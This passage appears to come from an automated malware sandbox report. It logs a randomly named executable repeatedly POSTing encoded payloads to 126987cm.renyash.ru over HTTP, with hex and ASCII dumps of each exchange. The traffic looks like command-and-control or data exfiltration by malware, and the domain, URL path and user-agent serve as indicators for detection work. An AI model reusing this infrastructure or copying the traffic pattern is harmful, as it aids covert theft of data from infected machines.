                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kgnqHcunTIBhMd5k1dU67fMAyEEmkQ1bmpfRcJrqvbTnmSjuV1%2B8u0I5sweUQ4b9xNUVO3WLgEbEoVWpy%2FThAxfjHYbh3taZ4V222IfOH27m37azhX1DR8WvSj8sRy3fUXi67mPq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f1b9ec642c4-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=6660&min_rtt=1619&rtt_var=10689&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=34804&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.4 | 50107 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:40.751832962 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:41.108598948 CET | 1072 | OUT | Data Raw: 54 5f 5b 57 56 41 59 5f 5d 56 5b 57 54 59 51 5a 58 54 58 59 5b 54 57 46 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T_[WVAY_]V[WTYQZXTXY[TWFVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!0;_#!]6+Z'Z";U('$#&4' 9)9(&!^&%X*3
                                                                                                                                Jan 1, 2025 21:48:41.199378967 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:41.375467062 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:41 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GvoFd1LiQyzmN05p8f4uvbXjDCiQ65qXXXkIhmoOsz8WvAZwrsIzkH3aeaHv%2Bomn%2FXjIDWwdX7Dvs5bF2A9w2FIx%2B7l9DicFJozFEmTaUjzWFmLsHxhbyGR5xdC%2F3FCJz7miH3Qb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f213a964345-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1817&min_rtt=1590&rtt_var=1052&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=427776&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                101 | 192.168.2.4 | 50108 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:41.504513979 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:41.858601093 CET | 1072 | OUT | Data Raw: 51 54 5b 52 56 40 59 54 5d 56 5b 57 54 5a 51 53 58 53 58 51 5b 52 57 49 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QT[RV@YT]V[WTZQSXSXQ[RWIVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ["01 "-$'=5;<(<"%(':[*69?(^&:!^&%X*?
                                                                                                                                Jan 1, 2025 21:48:41.969605923 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:42.240801096 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:42 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fXmSSWY4NKDMpGdiykxVFtp8GitUiK9IyVZIBPH0DZVY%2Fuh77fUwLdiyARL8cOlRMdhIAAv1JbHoTI4sere9YsYNa05Xe6M8GSTD37hX0hMsAs6o1m7vuRSuJRTjKs7bvCc8jNmT"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f25fb4a4368-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3770&min_rtt=1562&rtt_var=5003&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=75919&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                102 | 192.168.2.4 | 50109 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:42.365561962 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:42.718307972 CET | 1072 | OUT | Data Raw: 54 5e 5b 55 56 42 5c 52 5d 56 5b 57 54 59 51 52 58 55 58 51 5b 51 57 44 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T^[UVB\R]V[WTYQRXUXQ[QWDVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X$# 2683Z6+S+'$"73*>&(1!^&%X*3


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                103 | 192.168.2.4 | 50110 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:42.764910936 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1788
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:43.238221884 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:43.262908936 CET | 1788 | OUT | Data Raw: 51 54 5b 53 53 40 59 51 5d 56 5b 57 54 5f 51 5e 58 5c 58 50 5b 51 57 49 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: QT[SS@YQ]V[WT_Q^X\XP[QWIVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X$#!=!7\3"4(44!6 306\*@><7':!^&%X*+
                                                                                                                                Jan 1, 2025 21:48:43.608258963 CET | 956 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:43 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a0UJW2TFtK8jYF3aofwX3xCM4KDvnyMkIBYJrSn0Xs5vKBkGvj%2F5pSeI5xu3%2FUbqKMbrWx0UYzWm6VJ%2Ffah6dL7zZhCBwPljOeljqPwWAr9wAagFIvklD7Y274FxRQSDpaE%2F1j3S"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f2defbd5e66-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3600&min_rtt=2044&rtt_var=3879&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2133&delivery_rate=100717&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 02 1e 21 52 28 35 33 1f 21 31 26 0b 28 28 20 06 26 31 2e 12 32 23 08 1c 3c 06 33 14 3f 01 2f 09 32 12 38 5d 30 3a 07 51 3f 22 3c 1f 29 0c 20 5c 05 1b 39 19 24 00 37 12 24 38 3d 1f 3d 0e 24 5f 20 11 00 5b 2a 55 23 0c 23 2b 25 5a 32 16 22 0a 33 2a 0b 0d 2b 02 28 00 29 09 38 08 31 2d 2a 51 0f 16 38 53 3e 30 39 01 29 2f 3f 03 33 31 06 13 21 1b 32 0f 25 05 34 0d 27 39 26 5b 3f 07 20 0e 35 0d 20 0b 31 3f 35 06 26 00 2f 51 2c 3a 26 5e 20 01 22 53 02 3f 55 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98!R(53!1&(( &1.2#<3?/28]0:Q?"<) \9$7$8==$_ [*U##+%Z2"3*+()81-*Q8S>09)/?31!2%4'9&[? 5 1?5&/Q,:&^ "S?UV0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                104 | 192.168.2.4 | 50111 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:43.034423113 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:43.402575970 CET | 1072 | OUT | Data Raw: 54 5f 5b 57 53 44 59 51 5d 56 5b 57 54 5a 51 5c 58 57 58 5f 5b 52 57 49 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T_[WSDYQ]V[WTZQ\XWX_[RWIVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!X3!; 1167^36((U6&$$36*%%<-#%:!^&%X*?
                                                                                                                                Jan 1, 2025 21:48:43.479826927 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:43.752988100 CET | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:43 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uA5aeJPGko2Z1Zu5P4B3RcHtLIhxlMtXcVcjoVdP2sIYpRPDrY8%2FONceFM3YBv%2Fr9N25EE%2BqpU8O3d%2B4FY8fkKNqhMkgUslc%2F1%2FBhU8Fu9lU6brxco368zb85iV1CKjCcuLx5r3z"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f2f7f1278db-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4061&min_rtt=2292&rtt_var=4397&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=88780&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                105 | 192.168.2.4 | 50112 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:43.878165007 CET | 321 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 1, 2025 21:48:44.233675957 CET | 1072 | OUT | Data Raw: 54 55 5e 52 56 45 5c 54 5d 56 5b 57 54 59 51 5e 58 57 58 51 5b 56 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TU^RVE\T]V[WTYQ^XWXQ[VWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_&!/X#!-Z .\$-#"#+$;T5,U'3)*!E+-$_&!^&%X*3
                                                                                                                                Jan 1, 2025 21:48:44.349385023 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                Jan 1, 2025 21:48:44.617820024 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:44 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oQ8SyLiBaIZefZL9EER7iQaWX338IWJ%2BPIRttSlVXKiWckOpUAS1ntHaZ3CfQOzQkaBMCKwrwFvwVD63xszQBU%2BbEWSFiQr7KP13hZVrfde2RqF88ZohbwgEf9sI0UirLwv5E%2Bg4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f34d82b435e-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3381&min_rtt=1596&rtt_var=4168&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1393&delivery_rate=91956&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                106 | 192.168.2.4 | 50113 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Jan 1, 2025 21:48:44.747967005 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 1, 2025 21:48:45.093249083 CET | 1072 | OUT | Data Raw: 54 51 5b 5e 56 41 59 53 5d 56 5b 57 54 5f 51 59 58 55 58 58 5b 5e 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TQ[^VAYS]V[WT_QYXUXX[^WAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!'0 "1Z5-#['-#"+/<?W!6'$.>@%D?>8':!^&%X*+
Jan 1, 2025 21:48:45.192179918 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:45.372132063 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:45 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9xpDObtqmZaCISCBin%2BiLJJG3NPBMfmENziTbPOhjKtj2b%2Bmo3IZC7GvVoCfB4H60ZwAviRjt19KDlP5RtjL8YV23UUPGujc9r7O8htSouemRTdFlRNTnMJQR81t0Pfk7lTOodxg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f3a2c2517e9-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2835&min_rtt=1617&rtt_var=3043&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=128453&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.4 | 50114 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:45.537296057 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:45.893387079 CET | 1072 | OUT | Data Raw: 54 55 5b 51 56 40 59 52 5d 56 5b 57 54 5d 51 5a 58 57 58 5c 5b 51 57 45 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: TU[QV@YR]V[WT]QZXWX\[QWEVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!_334)X"X<%.8"]?W+$#5#$ [==@<72:!^&%X*#
Jan 1, 2025 21:48:45.991381884 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:46.269076109 CET | 799 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:46 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NyZ12pz7w9G785BbFTZKaebAWA95G7swgwX6FQXVrF293yBtNkkTx5jBdPJS5E06iXlPp9PbTqZalvQiDw7DGD6FZtI1gSHhAbzP9J7tmtQ4SysfiJlZmgNG44ywUUCIjsWBrK74"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f3f2e2c41bb-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2762&min_rtt=1589&rtt_var=2943&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=133005&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.4 | 50115 | 172.67.220.198 | 80 | 180 | C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
Timestamp | Bytes transferred | Direction | Data
Jan 1, 2025 21:48:46.391412020 CET | 345 | OUT | POST /VmpipeJavascript_HttpauthLongpollMultiWordpressDle.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                                Host: 126987cm.renyash.ru
                                                                                                                                Content-Length: 1072
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
Jan 1, 2025 21:48:46.749249935 CET | 1072 | OUT | Data Raw: 54 5f 5b 50 53 40 59 56 5d 56 5b 57 54 5b 51 59 58 5c 58 5e 5b 57 57 41 56 59 59 5a 56 5e 5e 58 58 5d 5f 5a 5a 5b 57 54 47 57 5a 5c 57 50 5f 5b 56 53 43 5b 5a 58 51 58 5d 5e 5b 5e 54 51 53 5e 58 5a 58 5c 54 52 5a 53 5d 59 5f 58 58 59 5a 56 5a 5b
                                                                                                                                Data Ascii: T_[PS@YV]V[WT[QYX\X^[WWAVYYZV^^XX]_ZZ[WTGWZ\WP_[VSC[ZXQX]^[^TQS^XZX\TRZS]Y_XXYZVZ[QTPYU]TR\S]]URY[GQQW]YT]ZS_P^[ZB[P]Y]V_Z\ZUSAR_WYR]]QX]\PSPP\[Z^[RWTVRZ]Z_^]ZR[S_]PZTQ^_PTVTRV\^[P^UZ[!$'[#1-[ .7\'.,[6(;T<$V!5(V%31*)(?1!^&%X*
Jan 1, 2025 21:48:46.845751047 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 1, 2025 21:48:47.109333992 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Wed, 01 Jan 2025 20:48:47 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
